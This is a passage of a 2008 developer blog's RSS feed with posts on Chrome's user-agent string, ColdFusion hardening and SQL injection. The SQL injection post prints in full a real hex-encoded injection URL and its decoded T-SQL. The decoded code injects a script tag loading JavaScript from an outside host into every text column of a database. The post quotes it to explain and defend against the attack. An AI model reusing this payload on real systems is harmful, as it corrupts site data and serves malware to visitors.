<li><strong>525.13</strong> &#8211; This is the WebKit version from which Chrome branched its copy. Site admins could use this to detect old versions with known bugs.</li>
<li><strong>(KHTML, like Gecko)</strong> &#8211; This introduces the substring <q>Gecko</q> into the <abbr title="User-Agent">UA</abbr> string while pointing out to human readers that Webkit was forked from <a href="http://en.wikipedia.org/wiki/KHTML" title="Wikipedia: KHTML" target="_blank" rel="nofollow">KHTML</a>. Without this substring, Chrome might be put in the same category as <abbr title="Internet Explorer">IE</abbr> and Netscape 4.</li>
<li><strong>Chrome/</strong> &#8211; This string identifies the browser as actually Google Chrome.</li>
<li><strong>0.2.149.27</strong> &#8211; This is the Chrome version. This could be used to detect old versions with known bugs.</li>
<li><strong>Safari/</strong> &#8211; This means that the browser is like Safari as opposed to being like Firefox.</li>
<li><strong>525.13</strong> &#8211; This just repeats the WebKit version in order to have <em>some</em> version but not the irrelevant Safari.app version.</li>
</ul>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/whats-in-google-chromes-user-agent-string/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to Protect Your Website from a Malicious Attack</title>
		<link>http://www.simonwhatley.co.uk/how-to-protect-your-website-from-a-malicious-attack</link>
		<comments>http://www.simonwhatley.co.uk/how-to-protect-your-website-from-a-malicious-attack#comments</comments>
		<pubDate>Mon, 18 Aug 2008 12:54:20 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Application.cfc]]></category>
		<category><![CDATA[Application.cfm]]></category>
		<category><![CDATA[attack]]></category>
		<category><![CDATA[best practice]]></category>
		<category><![CDATA[Business]]></category>
		<category><![CDATA[cfquery]]></category>
		<category><![CDATA[cfqueryparam]]></category>
		<category><![CDATA[ColdFusion]]></category>
		<category><![CDATA[ColdFusion Administrator]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[database server]]></category>
		<category><![CDATA[Databases]]></category>
		<category><![CDATA[encryption]]></category>
		<category><![CDATA[firewall]]></category>
		<category><![CDATA[how to]]></category>
		<category><![CDATA[howto]]></category>
		<category><![CDATA[Java]]></category>
		<category><![CDATA[Manitoba]]></category>
		<category><![CDATA[Mark Kruger]]></category>
		<category><![CDATA[prevention]]></category>
		<category><![CDATA[protection]]></category>
		<category><![CDATA[raw processing]]></category>
		<category><![CDATA[RDBMS]]></category>
		<category><![CDATA[script protect]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[software releases]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[variables]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[Web Application Hacker]]></category>
		<category><![CDATA[web code]]></category>
		<category><![CDATA[Web Security]]></category>
		<category><![CDATA[Web Server]]></category>
		<category><![CDATA[Web Servers]]></category>
		<category><![CDATA[webserver]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=809</guid>
		<description><![CDATA[Every seasoned developer will know that protecting your website from a hacker is a top priority, whether for your own reputation or for maintaining your company's reputation and log-term revenue prospects.]]></description>
			<content:encoded><![CDATA[<p>Every seasoned developer will know that protecting your website from a hacker is a top priority, whether for your own reputation or for maintaining your company&#8217;s reputation and log-term revenue prospects.</p>
<p><strong>Why should you be worried about security?</strong></p>
<p>The Web is changing many of the assumptions that people have historically made about computer security and publishing. As the Internet makes it possible for web servers to publish information to millions of users, it also makes it possible for computer hackers, crackers, criminals, vandals, and other &#8220;bad guys&#8221; to break into the very computers on which the web servers are running. Once subverted, web servers can be used by attackers as a launching point for conducting further attacks against users and organisations.</p>
<p>It is considerably more expensive and more time-consuming to recover from a security incident than to take preventative measures ahead of time.</p>
<p>This blog post started on the premise of protecting your website from a <a href="http://en.wikipedia.org/wiki/SQL_injection" title="Wikipedia: SQL Injection" target="_blank" rel="nofollow">SQL Injection</a> Attack. However, it is also appropriate to discuss, at a relatively high level, how to secure your server architecture and applications.</p>
<h3>Server-Level Security</h3>
<ul>
<li>Separate web- and database-servers on to different physical machines.</li>
<li>Secure the web- and database-servers with traditional techniques. Only authorised accounts should have the capabilities to run tasks on the machine. That means not giving admin-rights to the user account.</li>
<li>Keep servers up-to-date with the latest patches and software releases.</li>
<li>Minimise the number of services running on the server. This means limiting the services to only those required for the web- or database-servers to function.</li>
<li>Secure information in transit between servers. This may mean physically securing the network to prevent evesdropping via encryption or obfuscating the data amongst innocuous &#8216;noise&#8217;.</li>
<li>Secure the database server behind a firewall.</li>
</ul>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<h3>Application-Level Security</h3>
<ul>
<li>Separate ColdFusion, the webserver and database server user accounts. They should never be under the same system account.</li>
<li>Create a database user specifically for your ColdFusion datasource and restrict it to only the activities required for the application. The user should not have database-owner rights, access to databases not relating to the application or access to the system tables.</li>
<li>Revoke privileges in the ColdFusion datasource definition to prevent the SQL commands <code>CREATE</code>, <code>DROP</code>, <code>GRANT</code>, <code>REVOKE</code> and <code>ALTER</code>.</li>
<li>General settings in the ColdFusion Administrator:
<ul>
<li>Check the <em>Disable access to internal ColdFusion Java components</em> option.</li>
<li>Check the <em>Enable Global Script Protection</em> option.</li>
<li>Add a <em>Missing Template Handler</em>.</li>
<li>Add a <em>Site-wide Error Handler</em>.</li>
<li>Reduce the <em>Maximum size of post data</em> from 100<abbr title="megabytes">MB</abbr>.</li>
<li>Enable <em>Timeout Requests</em>, and set to 60 seconds or less.</li>
<li>Disable <em>Robust Exception Handling</em> on production servers.</li>
</ul>
</li>
</ul>
<h3>Code-Level Security</h3>
<ul>
<li>Application.cfc &#8211; Set the <code>scriptProtect</code> Application variable to <code>true</code> to enable application-wide cross-site script protection.
</li>
<li>CFQueryParam &#8211; This tag, importantly, verifies the data type of a query parameter and, for <abbr title="Relational Database Management Systems">RDBMS</abbr>s that support bind variables, enables ColdFusion to use bind variables in the <acronym title="Structured Query Language">SQL</acronym> statement. Bind variable usage enhances performance when executing a <code>cfquery</code> statement multiple times.

<div class="wp_syntax"><div class="code"><pre class="cfm" style="font-family:monospace;"><span style="color: #333333;"><span style="color: #800000;">&lt;cfquery</span> <span style="color: #0000ff;">name</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;qry&quot;</span> <span style="color: #0000ff">datasource</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;#APPLICATION.dsn#&quot;</span><span style="color: #800000;">&gt;</span></span>
SELECT column1, column2, column3
FROM tableName
WHERE column4 = <span style="color: #333333;"><span style="color: #800000;">&lt;cfqueryparam</span> <span style="color: #0000ff;">value</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;#variable1#&quot;</span> <span style="color: #0000ff">cfsqltype</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;cf_sql_bit&quot;</span> <span style="color: #0000ff;">/</span><span style="color: #800000;">&gt;</span></span>
AND column5 LIKE <span style="color: #333333;"><span style="color: #800000;">&lt;cfqueryparam</span> <span style="color: #0000ff;">value</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;%#variable2#%&quot;</span> <span style="color: #0000ff">cfsqltype</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;cf_sql_varchar&quot;</span> <span style="color: #0000ff;">maxlength</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;200&quot;</span> <span style="color: #0000ff;">/</span><span style="color: #800000;">&gt;</span></span>
AND column6 IN (<span style="color: #333333;"><span style="color: #800000;">&lt;cfqueryparam</span> <span style="color: #0000ff;">value</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;#variable3#&quot;</span> <span style="color: #0000ff">cfsqltype</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;cf_sql_integer&quot;</span> <span style="color: #0000ff">list</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;true&quot;</span> <span style="color: #0000ff;">/</span><span style="color: #800000;">&gt;</span></span>)
<span style="color: #333333;"><span style="color: #800000;">&lt;/cfquery&gt;</span></span></pre></div></div>

<p>There are limitations to the use of the <code>cfqueryparam</code> tag. In ColdFusion 7 for example, you cannot use them in queries using the <code>cachedWithin</code> attribute. Similarly, they cannot be used in <code>ORDER BY</code> clauses, although the use of conditional logic should resolve the need for order by variables.
</li>
<li>Functions &#8211; As a rule of thumb, validate <em>all</em> the data being passed into a query prior to it being used. ColdFusion MX 7 saw the introduction of the <code>isValid()</code> function. This function tests whether a value meets a validation or data type rule and can be used to replace a large number of type-specific functions such as <code>isArray()</code>, <code>isBinary()</code>, <code>isBoolean()</code>, <code>isDate()</code>, <code>isNumeric()</code> and <code>isSimpleValue()</code> etc.
</li>
<li>Stored Procedures &#8211; I often favour the use of stored procedures over standard queries. Not only do they add an additional level of performance, they provide an additional level of security; ColdFusion does not do any raw processing of queries in the web code, it simply passes variables down the wire to the database server.</li>
</ul>
<h3>Additional Resources</h3>
<ul>
<li>
<a href="http://www.amazon.com/Web-Security-Privacy-Commerce-2nd/dp/0596000456/ref=pd_bbs_sr_1?ie=UTF8&#038;s=books&#038;qid=1218663002&#038;sr=8-1" title="Amazon: Web Security, Privacy and Commerce" target="_blank" rel="nofollow">Web Security, Privacy and Commerce</a></li>
<li>O&#8217;Reilly&#8217;s <a href="http://www.amazon.com/Web-Application-Hackers-Handbook-Discovering/dp/0470170778/ref=pd_bbs_sr_1?ie=UTF8&#038;s=books&#038;qid=1218663073&#038;sr=1-1" title="Amazon: The Web Application Hacker's Handbook" target="_blank" rel="nofollow">The Web Application Hacker&#8217;s Handbook</a></li>
<li>Adobe&#8217;s whitepaper &#8211; <a href="http://www.adobe.com/devnet/coldfusion/articles/dev_security/coldfusion_security_cf8.pdf" title="Adobe: ColdFusion 8 Security PDF" target="_blank" rel="nofollow">ColdFusion 8 Developer Security Guidlines</a> (<abbr title="Portable Document Format">PDF</abbr>, 281k)</li>
<li>Adobe&#8217;s whitepaper &#8211; <a href="http://www.adobe.com/devnet/coldfusion/articles/dev_security/coldfusion_security_cf7.pdf" title="Adobe: ColdFusion 7 Security PDF" target="_blank" rel="nofollow">ColdFusion 7 Developer Security Guidlines</a> (<abbr title="Portable Document Format">PDF</abbr>, 217k)</li>
<li>Adobe DevNet &#8211; <a href="http://www.adobe.com/devnet/coldfusion/articles/stored_procs.html" title="Learning Stored Procedure Basics in ColdFusion 8" target="_blank" rel="nofollow">Learning Stored Procedure Basics in ColdFusion 8</a></li>
<li>0&#215;000000 # The Hacker Webzine&#8217;s article on <a href="http://www.0x000000.com/?i=610" title="The Hacker Webzine: Attacking ColdFusion" target="_blank" rel="nofollow">Attacking ColdFusion</a></li>
<li>Three part series from Mark Kruger (ColdFusion Muse) &#8211; <a title="Query String with cfqueryparam" href="http://www.coldfusionmuse.com/index.cfm/2008/7/21/query-string-with-cfqueryparam" target="_blank" rel="nofollow">Part 1</a>, <a title="Using CAST and ASCII" href="http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-ASCII" target="_blank" rel="nofollow">Part 2</a>, <a title="Using Order By" href="http://www.coldfusionmuse.com/index.cfm/2008/7/21/SQL-injection-using-order-by" target="_blank" rel="nofollow">Part 3</a></li>
<li>Brad Wood&#8217;s article on <a href="http://www.codersrevolution.com/index.cfm/2008/7/26/cfqueryparam-its-not-just-for-security-also-when-NOT-to-use-it" title="CFQueryParam is not just for security - When not to use it" target="_blank" rel="nofollow">CFQueryParam is not just for security</a>.</li>
</ul>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/how-to-protect-your-website-from-a-malicious-attack/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>What is a SQL Injection Attack</title>
		<link>http://www.simonwhatley.co.uk/what-is-a-sql-injection-attack</link>
		<comments>http://www.simonwhatley.co.uk/what-is-a-sql-injection-attack#comments</comments>
		<pubDate>Wed, 13 Aug 2008 13:09:45 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[attack]]></category>
		<category><![CDATA[C#]]></category>
		<category><![CDATA[China]]></category>
		<category><![CDATA[ColdFusion]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[malicious web users]]></category>
		<category><![CDATA[North Korea]]></category>
		<category><![CDATA[online world]]></category>
		<category><![CDATA[Russia]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[T]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[web applications]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=812</guid>
		<description><![CDATA[Over the past few weeks, subversive elements in the international arena have decided that attacking websites is a fun thing to do! The online world has become the new battle ground between nations vying to de-stabilise rivals. This may seem all very Jack Bauer, but we are increasingly seening ‘SQL injection attacks’ eminating from countries such as Russia, China and North Korea. Of course, that doesn’t mean our countries aren’t doing the same in return, but we only see the results from foreign-based attacks.]]></description>
			<content:encoded><![CDATA[<p>Over the past few weeks, subversive elements in the international arena have decided that attacking websites is a fun thing to do! The online world has become the new battle ground between nations vying to de-stabilise rivals. This may seem all very <a href="http://en.wikipedia.org/wiki/Jack_Bauer" title="Wikipedia: Jack Bauer" target="_blank" rel="nofollow">Jack Bauer</a>, but we are increasingly seeing &#8216;<acronym title="Structured Query Language">SQL</acronym> injection attacks&#8217; eminating from countries such as Russia, China and North Korea. Of course, that doesn&#8217;t mean our countries aren&#8217;t doing the same in return, but we only see the results from foreign-based attacks.</p>
<h3>What is a SQL Injection Attack?</h3>
<p><a href="http://en.wikipedia.org/wiki/SQL_injection" title="Wikipedia: SQL Injection" target="_blank" rel="nofollow">SQL Injection</a> is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<h3>Real World Example</h3>
<p><acronym title="Structured Query Language">SQL</acronym> Injection attacks are commonly associated with a technique called <a href="http://en.wikipedia.org/wiki/Cross-site_scripting" title="Wikipedia: Cross-Site Scripting" target="_blank" rel="nofollow">Cross-Site Scripting</a> (<abbr title="Cross-Site Scripting">XSS</abbr>). <abbr title="Cross-Site Scripting">XSS</abbr> is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users.</p>
<p>In reality, what does this look like?</p>
<p>The following is a legitimate URL that may be navigated to by the user agent:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.domain.com/folderName/fileName.cfm?variable1=0&amp;variable2=4241</pre></div></div>

<p>The following is a hacked URL:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.domain.com/folderName/filename.cfm?
variable1=0&amp;variable2=4241;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636861722
8323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F522
0464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C7
56D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E787479706
53D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204
F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E5
44F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746
5205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697
074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272720776
865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D226874747
03A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854204
6524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736
F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);</pre></div></div>

<p>The code appended to the <abbr title="Universal Resource Locator">URL</abbr> is hexadecimal. This can be interpreted by the <acronym title="Structured Query Language">SQL</acronym> engine. When the hexadecimal string is decoded by the <acronym title="Structured Query Language">SQL</acronym> server, the <acronym title="Structured Query Language">SQL</acronym> code generated looks similar to the following:</p>

<div class="wp_syntax"><div class="code"><pre class="txt" style="font-family:monospace;">DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR
FOR SELECT a.name,b.name from sysobjects a,syscolumns b
WHERE a.id=b.id
AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor
INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''&quot;&gt;&lt;/title&gt;
&lt;script src=&quot;http://1.verynx.cn/w.js&quot;&gt;&lt;/script&gt;&lt;!--''
where '+@C+' not like ''%&quot;&gt;&lt;/title&gt;
&lt;script src=&quot;http://1.verynx.cn/w.js&quot;&gt;&lt;/script&gt;&lt;!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor</pre></div></div>

<p>Somewhat unhelpfully, if the user credentials used to access the database have access to the system tables of your database, the <acronym title="Structured Query Language">SQL</acronym> injection attack will be able to interrogate those system tables and determine the structure of your database. The result, of the above example, is that the following code is injected into every string-based column in every table.</p>

<div class="wp_syntax"><div class="code"><pre class="txt" style="font-family:monospace;">&lt;/title&gt;&lt;script src=&quot;http://1.verynx.cn/w.js&quot;&gt;&lt;/script&gt;&lt;!--</pre></div></div>

<p>To put it simply, this is <em>very bad news</em>!</p>
<h3>ColdFusion-hacking is Popularised</h3>
<p>ColdFusion-based sites are by no means immune to this international &#8216;information war&#8217;. The popularity of attacks on ColdFusion-based websites can be summarised by the fact that an article was featured on <a href="http://www.0x000000.com/?i=610" title="0x000000.com - The Hacker Webzine">The Hacker Webzine</a> recently, detailing how to implement a successful attack.</p>
<h3>How to &#8216;Fix&#8217; the Problem</h3>
<p>As ColdFusion developers we not only need to be aware of the problem, we need to also know how to fix the problem and mitigate against an attack before it even happens.</p>
<p>In my next post, I will discuss how to fix a <acronym title="Structured Query Language">SQL</acronym> injection attack.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/what-is-a-sql-injection-attack/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

